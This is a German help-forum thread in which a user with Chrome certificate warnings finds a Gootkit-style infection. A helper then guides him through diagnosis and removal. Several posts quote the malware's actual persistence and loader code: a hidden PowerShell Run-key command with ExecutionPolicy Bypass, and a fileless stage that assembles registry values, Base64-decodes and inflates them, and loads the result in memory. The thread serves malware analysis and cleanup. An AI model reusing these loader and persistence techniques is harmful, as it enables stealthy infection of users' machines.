|
Plagegeister aller Art und deren Bekämpfung: Chrome meldet ungültige ZertifikateWindows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen. |
25.11.2020, 11:10 | #1 |
| Chrome meldet ungültige Zertifikate Hallo, ich habe jetzt noch keine nähren Analysen (FRST) machen können, da mit der PC noch nicht physisch zur Verfügung steht, möchte aber trotzdem schon mal das Problem schildern. Seit zwei Tagen ist es so, dass Chrom, und nur Crome (Firefox und Brave ist nicht betrofen) bei jeder (!) Webseite meldet, dass das Zertifikat ungültig ist. Schaue ich mir die Zertifikate an, dann ist der Aussteller immer Godady. Vergleiche ich die Zertifikate ist der Rest (bis auf Serial, Key, usw.) identisch. Es liegt also nahe dass für Chrome der Traffic durch einen Proxy geleitet wird der versucht in den SSL-Traffic einzubrechen. Ich habe im Zertifikatsstore ein Root-Zertifikat für 127.0.0.1 gefunden. Das reiche ich noch nach, habe ich im Moment nicht vorrätig. Das habe ich vorsorglich entfernt. Nach einem Neustart war das Problem dann weg. Am nächsten Tag war das Problem aber wieder da. Dann habe ich mich weiter umgesehen und in der Registry unter "Run" für den Benutzer folgendes gefunden: Code:
ATTFilter C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -Command "IEX([Environment]::GetEnvironmentVariable('aebadbbdaffbef', 'User'))" Code:
ATTFilter for ($i=0;$i -le 500;$i++){Try{$abc=$abc+(Get-ItemProperty -path 'HKCU:\SOFTWARE\aebadbbdaffbef').$i}Catch{}}IEX($abc) Das ist offensichtlich obfuskierter Powershell-Code. Lässt sich herausfinden was der tut? So viel für Heute dazu, später mehr. TIA Matthias |
25.11.2020, 16:17 | #2 |
/// TB-Ausbilder | Chrome meldet ungültige ZertifikateMein Name ist Matthias und ich werde dir bei der Analyse und der eventuell notwendigen Bereinigung deines Computers helfen. Das sieht nach Malware aus, die über den Run-Value auf den Schlüssel in der Reg zeigt. Was die Malware macht, kann ich dir nicht sagen. Es gibt aber Base64 Decoder/Encoder, evtl. bekommt man darüber was raus. Du scheinst gut in der Materie bewandert zu sein, trotzdem bitte nichts selber löschen... zuerst FRST auszuführen. Bitte poste die Logdateien von FRST, sobald du sie hast. Bitte beachten - Unsere Regeln bei der Bereinigung - Welche Informationen wir benötigen: Für alle Hilfesuchenden! Was muss ich vor der Eröffnung eines Themas beachten? Geändert von M-K-D-B (25.11.2020 um 17:09 Uhr) |
25.11.2020, 19:56 | #3 |
| Chrome meldet ungültige Zertifikate Hallo Namensvetter :-)
__________________Base64 ... die Sache mit den Tomaten auf den Augen :-) gleich mal anschauen ... Das mit dem FRST wird noch ein bisschen dauern. Erst muss ich das Gerät in die Hand bekommen. Ich möchte es bis auf weiteres nicht mehr am Netz betreiben. Eine Sache kann ich aber noch nachtragen: Der Windows-Defender hat mir die powershell.exe angemecker. Daraufhin habe ich mal Desinfect drauf losgelassen, allerdings ohne jedes Ergebnis. |
25.11.2020, 21:16 | #4 |
/// TB-Ausbilder | Chrome meldet ungültige Zertifikate Ok, danke für die Infos. Bitte keine Tools mehr blind/alleine laufen lassen, sondern warten, bis von mir weitere Anweisungen kommen. Warten wir die Logdateien von FRST ab, Spekulationen bringen nichts. |
28.11.2020, 17:31 | #5 |
/// TB-Ausbilder | Chrome meldet ungültige Zertifikate Servus, wie sieht es aus? Können wir dein System hier analysieren und bereinigen? Oder hast du andere Pläne? |
01.12.2020, 14:48 | #6 |
| Chrome meldet ungültige Zertifikate So, endlich habe ich die Logs ... habe mir erlaubt auch die Downloads der Privacy wegen zu bereinigen. |
01.12.2020, 14:58 | #7 |
/// TB-Ausbilder | Chrome meldet ungültige Zertifikate Hast du den HKU-run Wert der Malware (und ggf. weitere Einträge) bereits entfernt oder war das der Windows Defender? Mal schauen, ob überhaupt noch was davon übrig ist.... Schritt 1
Schritt 2
Schritt 3
Bitte poste mit deiner nächsten Antwort:
|
02.12.2020, 08:42 | #8 |
| Chrome meldet ungültige Zertifikate Bis auf das Zertifikat habe ich nichts bearbeitet. Das Zertifikat habe ich auch nicht gelöscht sondern verschoben. Dass FRST nichts passendes gefunden hat liegt wohl daran, dass es nur den HKCU des angemeldeten Users durchsucht und nicht alle. Ich habe mich jetzt als der Problemuser angemeldet und noch mal suchen lassen. Jetzt findet FRST auch die Keys. IMHO eine kleine Schwäche von FRST :-) Die Logs sind im Anhang. Das Problemzertifikat habe ich auch exportiert und mit angehängt. Mich würde primär interessieren was der Powershell-Code getan hat. Das entfernen wäre dann der zweite Schritt. Ich habe mal unter Linux versucht den Powershellcode zu Base64-decoden. Das gelingt mir aber nicht. Jetzt werde ich das noch unter Windows versuchen. Ich möchte unbedingt den Code sehen. |
02.12.2020, 10:52 | #9 |
| Chrome meldet ungültige Zertifikate Ich habe den Powersehll-Code durchgearbeitet und so modifiziert ausgeführt, dass immer nur Dateien erzeugt werden und nichts weiter passiert. Zum Schluss kommt ein Binary heraus, welches auf Virustotal so aussieht: https://www.virustotal.com/gui/file/973d0318f9d9aec575db054ac9a99d96ff34121473165b10dfba60552a8beed4/detection Folgendes hat sich gezeigt. Das hier: Code:
ATTFilter for ($i=0;$i -le 500;$i++){Try{$abc=$abc+(Get-ItemProperty -path 'HKCU:\SOFTWARE\aebadbbdaffbef').$i}Catch{}}IEX($abc) Code:
ATTFilter $EnCoFi = @'...sehr viel binäres ...'@ $DefSt = New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String($EnCoFi),[IO.Compression.CompressionMode]::Decompress) $UnFiBy = New-Object Byte[](587776) $DefSt.Read($UnFiBy, 0, 587776) | Out-Null [Reflection.Assembly]::Load($UnFiBy) [Test]::Install1() Meine Mutmassungen: Das wird so gemacht, damit nichts direkt auf der Platte zu finden ist. Durch den Autostart wird die Malware dann jedes Mal geladen. Der Defender hat aber trotzdem etwas mitbekommen, vielleicht per Verhaltensanalyse, und daher kommen die Meldungen für die powershell.exe Meine Fragen: Was ist zu tun ? Kann man in der Registry sehen wann die Keys erzeugt wurden? Geändert von mahescho (02.12.2020 um 10:57 Uhr) |
02.12.2020, 15:03 | #10 |
/// TB-Ausbilder | Chrome meldet ungültige Zertifikate Zur Analyse von Gootkit kannst du hier etwas nachlesen: BleepingComputer: Gootkit malware returns to life alongside REvil ransomware Malwarebytes: German users targeted with Gootkit banker or REvil ransomware Ich bin davon ausgegangen, dass du dich mit dem "infizierten Konto" angemeldet hast und nicht mit einem anderen Konto. Primär geht es hier im Forum um die Entfernung der Malware. Wenn du das selbst in die Hand nehmen möchtest, ist das ok für mich, dann gib kurz Bescheid und wir kürzen das Ganze hier ab. Ansonsten bitte die folgenden Schritte ausführen und die Logdateien posten.... Schritt 1
Schritt 2 Führe Malwarebytes' AntiMalware (MBAM) gemäß der bebilderten Anleitung aus und poste abschließend die Logdatei. Schritt 3 Führe AdwCleaner gemäß der bebilderten Anleitung aus und poste abschließend die Logdatei. Bitte poste mit deiner nächsten Antwort:
|
04.12.2020, 09:22 | #11 |
| Chrome meldet ungültige Zertifikate Danke so weit, ich verstehe was das Script tun soll. Eine letzte Frage: Ist es grundsätzlich eine gute Idee MBAM immer parallel zum Defender aktiv zu haben? Ich werde den Rechner jetzt komplett platt machen, da ich nicht wissen kann was die Malware noch so alles gemacht hat. Trotzdem werde ich das alles ausführen und der Vollständigkeit halber alle Logs posten. |
04.12.2020, 11:06 | #12 | ||
/// TB-Ausbilder | Chrome meldet ungültige ZertifikateZitat:
Eventuell lohnt sich ein Blick auf unsere Empfehlungen. Zitat:
Die Logdateien musst du wegen mir aber dann nicht mehr posten, die Zeit kannst du dir sparen. Alles Gute! Dieses Thema scheint erledigt und wird aus unseren Abos gelöscht. Solltest Du das Thema erneut brauchen, schicke uns bitte eine Erinnerung inklusive Link zum Thema. Jeder andere bitte hier klicken und ein eigenes Thema erstellen. |
Themen zu Chrome meldet ungültige Zertifikate |
127.0.0.1, analyse, benutzer, code, firefox, folge, folgendes, gültig, herausfinden, heute, ide, iex, melde, meldet, neustart, powershell, problem, proxy, registry, serial, software, traffic, ungültig, versucht, webseite, windows, windows 10 |